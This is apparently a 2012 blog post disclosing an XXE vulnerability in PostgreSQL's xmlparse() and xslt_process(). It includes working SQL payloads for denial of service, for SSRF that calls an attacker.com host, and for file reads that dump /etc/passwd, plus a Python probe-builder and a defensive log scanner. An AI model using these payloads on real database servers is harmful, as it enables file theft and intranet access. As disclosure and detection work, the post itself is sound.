Friday, June 1, 2012

PostgreSQL (all) error-based XXE 0day

We recently found, and published at PHDays, a 0day error-based XXE vulnerability in PostgreSQL.
At present an attacker can use it to read parts of local files and to make requests from the DB server into the intranet (SSRF, Server-Side Request Forgery).

Examples:
DoS (the entity points at /dev/random, a device that never returns EOF, so libxml2 keeps reading and the backend hangs):
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

SSRF (the DB server itself fetches the URL, so the request reaches hosts that only the server can see):
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE (the target file is not well-formed XML, so libxml2 fails while expanding the entity and echoes the offending line of the file in the error DETAIL; a file whose contents parse as plain character data, /etc/passwd for instance, produces no error and therefore no leak, which is why a shell script containing '<' redirections is used here):

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAIL:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab
       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab
        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab
          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
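As an added example (not code from the original post), the following Python helper builds the xmlparse() probe for an arbitrary path and pulls the leaked source lines back out of PostgreSQL's error DETAIL. The function names and the sample error text are constructed here; the sample mirrors the output shown above.

```python
# Added example (not from the original post): build the xmlparse() probe for a
# path and recover the file fragments that libxml2 echoes back in the error
# DETAIL.  Function names and the sample error text are constructed here.
import re
from typing import Dict


def build_probe(path: str, entity: str = "abc") -> str:
    """Return the SQL statement that makes the server-side libxml2 open `path`."""
    # The internal DTD subset declares an external entity whose SYSTEM
    # identifier is the target file; referencing &abc; forces resolution.
    payload = (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE content [ <!ENTITY {entity} SYSTEM "{path}">]>'
        f"<content>&{entity};</content>"
    )
    # Inside a single-quoted SQL literal a single quote is written twice.
    return "select xmlparse(document '" + payload.replace("'", "''") + "')"


# libxml2 reports "<file>:<line>: parser error : <message>", followed by the
# offending source line and then a caret line marking the column.
_PARSER_ERROR = re.compile(
    r"^(?:DETAILS?:\s*)?(?P<file>[^:]+):(?P<line>\d+): parser error : (?P<msg>.*)$"
)


def extract_fragments(error_text: str, path: str) -> Dict[int, str]:
    """Map leaked line number -> leaked text for the entity file at `path`.

    Only lines that made libxml2 fail are echoed, so the result covers the
    parts of the file that are not well-formed XML (here: shell redirections
    containing '<'), not the whole file.
    """
    lines = error_text.splitlines()
    leaked: Dict[int, str] = {}
    for idx, raw in enumerate(lines[:-1]):
        match = _PARSER_ERROR.match(raw.strip())
        if not match or match.group("file") != path:
            continue
        context = lines[idx + 1]
        # Some renderings join the caret line onto the context line; drop it
        # (a '^' that is genuinely part of the file would be cut off too).
        fragment = context.split("^", 1)[0].rstrip()
        lineno = int(match.group("line"))
        # Keep the longest echo if the same line is reported several times.
        if len(fragment) > len(leaked.get(lineno, "")):
            leaked[lineno] = fragment
    return leaked


# Sample error text, constructed to mirror the output shown in the post.
SAMPLE_ERROR = """ERROR:  invalid XML document
DETAIL:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab
       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab
        ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
"""

if __name__ == "__main__":
    print(build_probe("/etc/network/if-up.d/mountnfs"))
    print(extract_fragments(SAMPLE_ERROR, "/etc/network/if-up.d/mountnfs"))
```

Run against the sample, `extract_fragments` returns only line 28 of the script; everything else in the file parsed as character data and was never echoed, which is the practical limit of the error-based channel.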
UPDATE!
A classical XXE via the XSLT transformation function has also been found. xslt_process() (provided by the contrib xml2 module, not by core PostgreSQL) expands the external entity and returns its contents in the query result, so any file readable by the server process comes back in full rather than as error fragments:


SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
                                     xslt_process                                    
-----------------------------------------------------------------------------------------
 <?xml version="1.0"?>
 <samples><sample>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 Debian-exim:x:111:115::/var/spool/exim4:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 oracle:x:1002:1002::/u01/app/oracle:/bin/bash
 </sample></samples>

(1 row)
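Added example (not from the original post) for the defensive side: a scanner that flags the two XML sinks discussed in this post, xmlparse() and xslt_process(), in PostgreSQL statement logs whenever their argument declares an external entity, and classifies the target as a local file, a device, or a network request (SSRF). The log lines, the function names and the log format (log_statement = 'all' style output) are constructed assumptions.

```python
# Added example (not from the original post): flag the XXE sinks discussed
# above in PostgreSQL statement logs.  Log lines and function names are
# constructed for this example and assume log_statement = 'all' style output.
import re
from typing import Dict, List

# SQL functions from the post that hand attacker-controlled XML to libxml2.
XML_SINKS = re.compile(r"\b(xmlparse|xslt_process)\s*\(", re.I)

# External entity declaration inside the DTD: SYSTEM or PUBLIC identifier.
# Inside a single-quoted SQL literal, XML's single quote appears doubled ('').
EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s+)?(?P<name>[\w.-]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|''[^']*''))\s+"
    r"(?P<q>\"|'')(?P<uri>.*?)(?P=q)",
    re.I,
)


def classify_target(uri: str) -> str:
    """Describe what resolving the entity's SYSTEM identifier would touch."""
    scheme = re.match(r"^([a-z][a-z0-9+.-]*)://", uri, re.I)
    if scheme:
        name = scheme.group(1).lower()
        # file:// is still a local read; anything else is a request made
        # from the database host (SSRF).
        return "local-file" if name == "file" else f"network:{name}"
    if uri.startswith("/dev/"):
        return "device"  # e.g. /dev/random never hits EOF: parser hangs (DoS)
    return "local-file"


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per external entity passed to an XML sink.

    Only statements that both call a sink and carry the DTD are flagged; a
    payload stored in one statement and parsed by a later one is not linked.
    """
    findings: List[Dict[str, str]] = []
    for line in lines:
        if not XML_SINKS.search(line):
            continue
        for m in EXTERNAL_ENTITY.finditer(line):
            uri = m.group("uri")
            findings.append({
                "entity": m.group("name"),
                "uri": uri,
                "kind": classify_target(uri),
                "statement": line.split("statement: ", 1)[-1],
            })
    return findings


# Constructed log lines mirroring the queries from the post (not real logs).
LOG_LINES = [
    "2012-06-01 12:00:01 MSK [4711] LOG:  statement: select xmlparse(document "
    "'<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE content "
    "[ <!ENTITY abc SYSTEM \"/dev/random\">]><content>&abc;</content>')",
    "2012-06-01 12:00:02 MSK [4711] LOG:  statement: select xmlparse(document "
    "'<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE content "
    "[ <!ENTITY abc SYSTEM \"http://attacker.com/?xxe=OK\">]><content>&abc;</content>')",
    "2012-06-01 12:00:03 MSK [4711] LOG:  statement: SELECT xslt_process("
    "'<!DOCTYPE employee [<!ENTITY asd SYSTEM \"/etc/passwd\">] >"
    "<employee><name>&asd;</name></employee>'::text, '<xsl:stylesheet/>'::text)",
    # Benign: internal entity only, and no DTD at all.
    "2012-06-01 12:00:04 MSK [4711] LOG:  statement: select xmlparse(document "
    "'<!DOCTYPE x [<!ENTITY greet \"hello\">]><x>&greet;</x>')",
    "2012-06-01 12:00:05 MSK [4711] LOG:  statement: select xmlparse(content '<a>&amp;</a>')",
]

if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding["kind"], finding["entity"], finding["uri"])
```

On the constructed lines the scanner reports the /dev/random probe as a device read, the attacker.com URL as a network request, and the xslt_process payload as a local file read, while the two benign statements (internal entity, no DTD) produce nothing.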

24 comments:

  1. I'd like to note that xslt_process is from the xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.

    PS. That's why I wasn't able to discover this file reading during phdays =)

    [1] http://www.postgresql.org/docs/9.1/static/xml2.html
